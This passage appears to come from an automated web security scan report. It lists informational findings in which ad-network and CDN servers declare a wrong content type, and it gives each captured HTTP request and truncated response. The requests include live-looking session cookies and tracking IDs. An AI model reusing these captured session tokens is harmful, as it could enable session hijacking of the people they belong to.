2011&prad=310177527&arc=211671722&; ar_p97174789=exp=39&initExp=Sun Apr 24 12:09:48 2011&recExp=Mon May 9 13:59:45 2011&prad=256163696&arc=206438267&; BMX_3PC=1; BMX_G=method%2D%3E%2D1%2Cts%2D%3E1304949586%2E006%2Cwait%2D%3E10000%2C; UID=875e3f1e-184.84.247.65-1303349046

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 09 May 2011 13:59:57 GMT
Content-Type: application/x-javascript
Connection: close
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 42

COMSCORE.BMX.Broker.handleInteraction("");

25.4. http://bs.serving-sys.com/BurstingPipe/adServer.bs

Summary

Severity:   Information
Confidence:   Firm
Host:   http://bs.serving-sys.com
Path:   /BurstingPipe/adServer.bs

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /BurstingPipe/adServer.bs?cn=rsb&c=28&pli=2393594&PluID=0&w=300&h=250&ord=949833763&ucm=true&ncu=$$http://adserver.adtech.de/adlink|577|2951880|0|170|AdId=6233986;BnId=1;itime=949833763;key=key1+key2+key3+key4;nodecode=yes;link=$$ HTTP/1.1
Host: bs.serving-sys.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/user/register
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ebNewBandWidth_.bs.serving-sys.com=131%3A1303947429371; eyeblaster=BWVal=737&BWDate=40663.344456&debuglevel=&FLV=10.2154&RES=128&WMPV=0; TargetingInfo=0007g420000%5f; C4=; u2=eabf95f8-0142-429e-b9ac-2012a75d64353HU0ag; A3=jlP8aJjE0dpH00001jAsGaJH702WG00003jBofaIOs07Si00001; B3=8Whx0000000003uu9wtb0000000001ur9oDg0000000001ut

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html
Expires: Sun, 05-Jun-2005 22:00:00 GMT
Vary: Accept-Encoding
Set-Cookie: A3=jlP8aJjE0dpH00001juYgaL6v07Kl00001jBofaIOs07Si00001jAsGaJH602WG00003; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
Set-Cookie: B3=9wtb0000000001ur8Whx0000000003uu9oDg0000000001ut98nW0000000001uy; expires=Sun, 07-Aug-2011 10:07:18 GMT; domain=.serving-sys.com; path=/
P3P: CP="NOI DEVa OUR BUS UNI"
Date: Mon, 09 May 2011 14:07:17 GMT
Connection: close
Content-Length: 2128

var ebPtcl="http://";var ebBigS="ds.serving-sys.com/BurstingCachedScripts/";var ebResourcePath="ds.serving-sys.com/BurstingRes//";var ebRand=new String(Math.random());ebRand=ebRand.substr(ebRand.index
...[SNIP]...

25.5. http://cdn.apture.com/media/searchfilter.khtml.v30596971.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.apture.com
Path:   /media/searchfilter.khtml.v30596971.js

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /media/searchfilter.khtml.v30596971.js HTTP/1.1
Host: cdn.apture.com
Proxy-Connection: keep-alive
Referer: http://cdn.apture.com/media/html/aptureLoadIframe.html?v=30596971
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AC=QuDxqe1K4l

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 13:59:13 GMT
Server: PWS/1.7.2.1
X-Px: ht iad-agg-n25.panthercdn.com
P3P: CP="NON CURa ADMa DEVa TAIa PSAa PSDa IVAa IVDa HISa OUR LEG UNI COM NAV INT"
Cache-Control: max-age=604800
Expires: Sat, 14 May 2011 00:19:44 GMT
Age: 221969
Content-Type: application/x-javascript
Vary: Accept-Encoding
Px-Uncompress-Origin: 4080
Last-Modified: Sat, 07 May 2011 00:12:37 GMT
Connection: keep-alive
Content-Length: 4080

apture.fileCache.load("searchfilter", "if(window.apture.rt)window.apture.rt.Et=/\\b(be~?an~?er|qu~?ee~?f|mo~?th~?er~?fu~?ck~?s|ej~?ac~?ul~?at~?ed|cu~?nt~?li~?ck~?er|as~?sh~?ol~?es|mi~?lf|pe~?ni~?s|pi~
...[SNIP]...

25.6. http://cdn.gigya.com/js/gigya.services.socialize.plugins.simpleshare.min.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://cdn.gigya.com
Path:   /js/gigya.services.socialize.plugins.simpleshare.min.js

Issue detail

The response contains the following Content-type statement: Content-Type: application/x-javascript. The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /js/gigya.services.socialize.plugins.simpleshare.min.js HTTP/1.1
Host: cdn.gigya.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Sun, 01 May 2011 07:04:34 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
x-server: web101
P3P: CP="IDC COR PSA DEV ADM OUR IND ONL"
X-Powered-By: ASP.NET
Cache-Control: max-age=900
Date: Mon, 09 May 2011 13:59:46 GMT
Connection: close
Content-Length: 21429

gigya.global._GetElementPos=function(obj){var curleft=curtop=0;if(obj.offsetParent){do{curleft+=obj.offsetLeft;curtop+=obj.offsetTop;}while(obj=obj.offsetParent);}return{left:curleft,top:curtop};};gig
...[SNIP]...

25.7. http://content.pulse360.com/cgi-bin/context.cgi

Summary

Severity:   Information
Confidence:   Firm
Host:   http://content.pulse360.com
Path:   /cgi-bin/context.cgi

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/context.cgi?id=91041742&ganid=floridatoday&gans=news&ganss=&format=bare&ganst=&title=1&signup=1 HTTP/1.1
Host: content.pulse360.com
Proxy-Connection: keep-alive
Referer: http://www.floridatoday.com/article/20110508/NEWS01/105080319/Highly-publicized-murder-Caylee-Anthony-rivets-enrages
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:28 GMT
Server: Barista/1.1
Connection: Keep-Alive
Content-Type: text/html
set-cookie: vi_1.021=130494962871114765000106049048049; domain=.pulse360.com; path=/; expires=Tue, 08-May-2012 14:00:28 GMT
set-cookie: fc_1.2=AXzzx00; domain=.pulse360.com; path=/; expires=Mon, 16-May-2011 14:00:28 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Content-Length: 3662

document.write('<style type="text/css">.p360_listing { cursor: pointer;}</style><!--Ad Markup by Seevast--><div id="p360_ad_unit"><div id="p360_header"><div class="p360_aligner_left"><span id="p360_
...[SNIP]...

25.8. http://event.adxpose.com/event.flow

Summary

Severity:   Information
Confidence:   Firm
Host:   http://event.adxpose.com
Path:   /event.flow

Issue detail

The response contains the following Content-type statement: Content-Type: text/javascript;charset=UTF-8. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.indianasnewscenter.com%2Fnews%2Flocal%2FAt-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html&uid=9ByavNwWFmRBp6h6_40792835&xy=0%2C0&wh=728%2C90&vchannel=382765&cid=Toyota_2011_RAAP&iad=1304949550599-23798237647861244&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=16&flash=10.2&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://ad.doubleclick.net/adi/N2724.Centro.com/B5245176.26;sz=728x90;ord=[timestamp]?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=8046e9fe-2ba6-4040-b3b9-5d1af9c46888

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=E6395C0819D24DF51059D75784832A19; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 106
Date: Mon, 09 May 2011 13:59:11 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("9ByavNwWFmRBp6h6_40792835");

25.9. http://imp.fetchback.com/serve/fb/adtag.js

Summary

Severity:   Information
Confidence:   Firm
Host:   http://imp.fetchback.com
Path:   /serve/fb/adtag.js

Issue detail

The response contains the following Content-type statement: Content-Type: text/html; charset=UTF-8. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /serve/fb/adtag.js?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url= HTTP/1.1
Host: imp.fetchback.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304903354_13521:0_11051:0_13981:208292_13479:208292_15758:367625_12704:367625_4895:795810_10164:1160086_10638:1160086_10640:1160086_10641:1160086_1437:1160086_1660:1723682; sit=1_1304903354_3006:489:0_3455:208292:208292_2988:430572:396401_3801:543015:542595_1714:827548:795810_3306:1055174:367625_719:1160913:1160086_2451:1211782:1206682_3236:1369745:1369627_782:1724031:1723682; bpd=1_1304903354_1ZunS:78_1ZCU5:4QUb; apd=1_1304903354_1ZunS:6O; afl=1_1304903354; cre=1_1304949669_29807:59535:1:0_29802:59536:1:588698_29805:59534:1:589359; uid=1_1304949669_1303179323923:6792170478871670; kwd=1_1304949669_12936:254607_11317:1206401_11717:1206401_11718:1206401_11719:1206401; scg=1_1304949669; ppd=1_1304949669

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:01:12 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: uid=1_1304949672_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 14:01:12 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 14:01:12 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 294

document.write("<"+"iframe src='http://imp.fetchback.com/serve/fb/imp?tid=59534&type=lead&clicktrack=http://optimized-by.rubiconproject.com/t/7858/13549/26630-2.3200913.3219970?url=' width='728' heigh
...[SNIP]...

25.10. http://l.apture.com/v3/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://l.apture.com
Path:   /v3/

Issue detail

The response contains the following Content-type statement: Content-Type: text/javascript. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /v3/?1=%7B%22isTMMEnabled%22%3A1%2C%22fullBarEnabled%22%3Afalse%2C%22numLinks%22%3A2%2C%22numTmmLinks%22%3A0%2C%22socialLinkCount%22%3A0%2C%22socialLinkStatus%22%3A207%2C%22abTestLinkCountsEnabledSide%22%3A%22B%22%2C%22abTestLinkStylesSide%22%3Anull%2C%22abTestLinkCountStyleSide%22%3Anull%2C%22abTestLinkCursorStyleSide%22%3Anull%2C%22type%22%3A1131%2C%22siteId%22%3A206082%2C%22visitId%22%3A24456114740677%2C%22pageId%22%3A306599076%7D&AC=QuDxqe1K4l HTTP/1.1
Host: l.apture.com
Proxy-Connection: keep-alive
Referer: http://www.indianasnewscenter.com/news/local/At-Noon-Casey-Anthony-Trial-Begins-In-Florida-Plus-More-121488004.html
Origin: http://www.indianasnewscenter.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript
Access-Control-Allow-Origin: *
Access-Control-Allow-Methods: GET, POST
Access-Control-Max-Age: 604800
Content-Length: 2
Date: Mon, 09 May 2011 13:59:13 GMT
Connection: close

{}

25.11. http://mediacdn.disqus.com/1304703476/fonts/disqus-webfont.woff

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mediacdn.disqus.com
Path:   /1304703476/fonts/disqus-webfont.woff

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /1304703476/fonts/disqus-webfont.woff HTTP/1.1
Host: mediacdn.disqus.com
Proxy-Connection: keep-alive
Referer: http://www.clashmusic.com/news/sufjan-stevens-suffered-nervous-breakdown
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-487374334-1303349183888; sessionid=5439c19bf65868637b6d94bd5708f992; __utmz=113869458.1304526991.8.8.utmcsr=news.techworld.com|utmccn=(referral)|utmcmd=referral|utmcct=/personal-tech/3277379/x-factor-contestants-warned-after-250000-data-breach/; __utma=113869458.1602204697.1303349184.1304359650.1304526991.8

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Sat, 07 May 2011 00:12:21 GMT
P3P: CP="DSP IDC CUR ADM DELi STP NAV COM UNI INT PHY DEM"
Access-Control-Allow-Origin: *
Content-Type: text/plain
Vary: Accept-Encoding
Content-Length: 5304
X-Varnish: 2646202842 2627851889
Cache-Control: max-age=2543833
Expires: Wed, 08 Jun 2011 00:38:41 GMT
Date: Mon, 09 May 2011 14:01:28 GMT
Connection: close

wOFF...............`........................FFTM...l........Z.V.GDEF........... .Y..OS/2.......E...`t.f.cmap................cvt .......6...6 ...fpgm...........e../.gasp................glyf...........p
...[SNIP]...

25.12. http://mediaforce.sitescout.netdna-cdn.com/ad150-c157549.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://mediaforce.sitescout.netdna-cdn.com
Path:   /ad150-c157549.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain unrecognised content.

Request

GET /ad150-c157549.jpg HTTP/1.1
Host: mediaforce.sitescout.netdna-cdn.com
Proxy-Connection: keep-alive
Referer: http://mf.sitescout.com/disp?pid=0C66F16&cm=http%3A%2F%2Fib.adnxs.com%2Fclick%2F6UMX1LfMyT_pQxfUt8zJPwAAACAEVvI_6UMX1LfMyT_pQxfUt8zJP2gr4_HSxA8NSsYda6b2ziWm88dNAAAAAAc4BgBmAQAAZgEAAAIAAACj0gIA8WoAAAEAAABVU0QAVVNEANgCWgD-AQAAQg8AAQMCAAUAAAAAcCffIAAAAAA.%2Fcnd%3D%21oSCxOQjC6AIQo6ULGAAg8dUBKAAx6kMX1LfMyT9CEwgAEAAYACABKP7__________wFCCwiCOxAAGAAgAigBQgsIgzsQABgAIAIoAUIOCMg-EPi6AhihEyACKAVCCwitZBAAGAAgAigBSANQAFj-A2AEaOYC%2Freferrer%3Dhttp%253A%252F%252Fwww.thevine.com.au%2Fclickenc%3D&rand=97302867
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-827949149-1303243841013

Response

HTTP/1.1 200 OK
Server: nginx/0.8.36
Date: Mon, 09 May 2011 14:05:58 GMT
Content-Type: image/jpeg
Connection: keep-alive
ETag: W/"7503-1300811120000"
Last-Modified: Tue, 22 Mar 2011 16:25:20 GMT
Content-Length: 7503
X-Cache: HIT
Accept-Ranges: bytes

......JFIF.....`.`......Exif..II*..............C....................................................................C.......................................................................K.d.."......
...[SNIP]...

25.13. http://pglb.buzzfed.com/124044/2cda0cc53888bd4bde08b06faa4b2d81

Summary

Severity:   Information
Confidence:   Firm
Host:   http://pglb.buzzfed.com
Path:   /124044/2cda0cc53888bd4bde08b06faa4b2d81

Issue detail

The response contains the following Content-type statement: Content-Type: text/javascript; charset=ISO-8859-1. The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /124044/2cda0cc53888bd4bde08b06faa4b2d81?callback=BF_PARTNER.gate_response&cb=3766 HTTP/1.1
Host: pglb.buzzfed.com
Proxy-Connection: keep-alive
Referer: http://www.thevine.com.au/music/blogs/music-dump-_-sufjan-stevens-selling-beastie-boys-headphones-to-johnny-cash20110508.aspx
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Server: lighttpd
Content-Length: 38
Cache-Control: max-age=466826
Expires: Sat, 14 May 2011 23:47:25 GMT
Date: Mon, 09 May 2011 14:06:59 GMT
Connection: close

BF_PARTNER.gate_response(1304801415);

25.14. http://wd.sharethis.com/api/getCount2.php

Summary

Severity:   Information
Confidence:   Firm
Host:   http://wd.sharethis.com
Path:   /api/getCount2.php

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /api/getCount2.php?cb=stButtons.processCB&url=http%3A%2F%2Fwww.orlandosentinel.com%2Fbusiness%2Fos-cfb-cover-casey-tv-20110509%2C0%2C6839926.story HTTP/1.1
Host: wd.sharethis.com
Proxy-Connection: keep-alive
Referer: http://www.orlandosentinel.com/business/os-cfb-cover-casey-tv-20110509,0,6839926.story
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __stid=CspT702sdV9LL0aNgCmJAg==; __switchTo5x=64; __utmz=79367510.1303478681.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=8f891fa-12f7d623a1f-609dccbc-23; __utma=79367510.1475296623.1303478681.1303478681.1303478681.1

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:00:18 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.5
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 246

stButtons.processCB({"url":"http:\/\/www.orlandosentinel.com\/business\/os-cfb-cover-casey-tv-20110509%2C0%2C6839926.story","email":9,"total":9,"ourl":"http:\/\/www.orlandosentinel.com\/business\/os-c
...[SNIP]...

25.15. http://www.burstnet.com/cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.burstnet.com
Path:   /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /cgi-bin/ads/ad20731a.cgi/v=2.3S/sz=300x250A/NZ/23755/NF/RETURN-CODE/JS/ HTTP/1.1
Host: www.burstnet.com
Proxy-Connection: keep-alive
Referer: http://www.nme.com/news/sufjan-stevens/56527
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: 56Q8=3qCOBQmN0yUv6WrF--lZoc3dRfuweNq9qe4Bp0O5v0HfEOi0vh6R2kg

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Ad-Reach: Burst!Media
Pragma: no-cache
Cache-Control: no-cache
Content-Type: text/html
Vary: Accept-Encoding
Date: Mon, 09 May 2011 14:00:59 GMT
Connection: close
Set-Cookie: /BC3=.P_d.; path=/
Set-Cookie: /SO=:201:; path=/
Set-Cookie: /PC=0; path=/; expires=Mon, 16-May-2011 14:00:59 GMT
Set-Cookie: /SC=0-2vc.1; path=/
Content-Length: 1393


document.write('<IFR'+'AME SRC="http://ad.doubleclick.net/adi/N3671.burst/B5229711.3;sz=300x250;pc=[TPAS_ID];click=http://www.burstnet.com/ads/ad20731a-map.cgi/BCPG182030.266877.318088/VTS=2iU9W.LI
...[SNIP]...

25.16. http://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cgi-local/cart.cgi?asmakit_shopcart_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>

25.17. http://www.ccnow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccnow.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:37 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:55 GMT
ETag: "2fe-4dc2e613"
Accept-Ranges: bytes
Content-Length: 766
Content-Type: text/plain

...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...

25.18. http://www.ccnow.com/images/cart/ccnowcart_gray.jpg

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ccnow.com
Path:   /images/cart/ccnowcart_gray.jpg

Issue detail

The response contains the following Content-type statement: Content-Type: image/jpeg. The response states that it contains a JPEG image. However, it actually appears to contain a GIF image.

Request

GET /images/cart/ccnowcart_gray.jpg HTTP/1.1
Host: www.ccnow.com
Proxy-Connection: keep-alive
Referer: http://www.ccnow.com/cgi-local/sc_cart.cgi?8147444662139294
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949962

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:06:06 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:59 GMT
ETag: "523-4dc2e617"
Accept-Ranges: bytes
Content-Length: 1315
Content-Type: image/jpeg

GIF89a.&....ZWX.........1-....vstLIJ.................?;<hef......@..... {.0..`......q.p...........P...h.#. ...........................................................................................
...[SNIP]...

25.19. https://www.ccnow.com/cgi-local/cart.cgi

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ccnow.com
Path:   /cgi-local/cart.cgi

Issue detail

The response contains the following Content-type statement: Content-Type: text/html. The response states that it contains HTML. However, it actually appears to contain plain text.

Request

GET /cgi-local/cart.cgi?asmakit_AKR213_http://asthmatickitty.com/closefancybox.php HTTP/1.1
Host: www.ccnow.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.5.10.1304949980; oudelay=1304950305; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206;

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:12:24 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Connection: close
Content-Type: text/html
Content-Length: 144

<br><center><table border=1 cellspacing=0 cellpadding=10><tr align=center><td>Server is busy; please try again later.</td></tr></table></center>

25.20. https://www.ccnow.com/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   https://www.ccnow.com
Path:   /favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: www.ccnow.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB7568A8E92F8CE5F45B4467139B51A38206; oudelay=1304949975; ccnowcart=ENC010DEC12F02A8FAE3CA5C242A1F216FB75444E983624DD85F34467139B51A38206; __utmz=1.1304949980.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1027269073.1304949980.1304949980.1304949980.1; __utmc=1; __utmb=1.1.10.1304949980

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 14:07:47 GMT
Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6
Last-Modified: Thu, 05 May 2011 18:01:55 GMT
ETag: "2fe-4dc2e613"
Accept-Ranges: bytes
Content-Length: 766
Keep-Alive: timeout=15, max=150
Connection: Keep-Alive
Content-Type: text/plain

...... ..............(... ...@..................................................................................................................................................DDDDDDDDDDDD...........
...[SNIP]...

25.21. http://www.clashmusic.com/sites/all/themes/clash/favicon.ico

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.clashmusic.com
Path:   /sites/all/themes/clash/favicon.ico

Issue detail

The response contains the following Content-type statement: Content-Type: text/plain; charset=UTF-8. The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

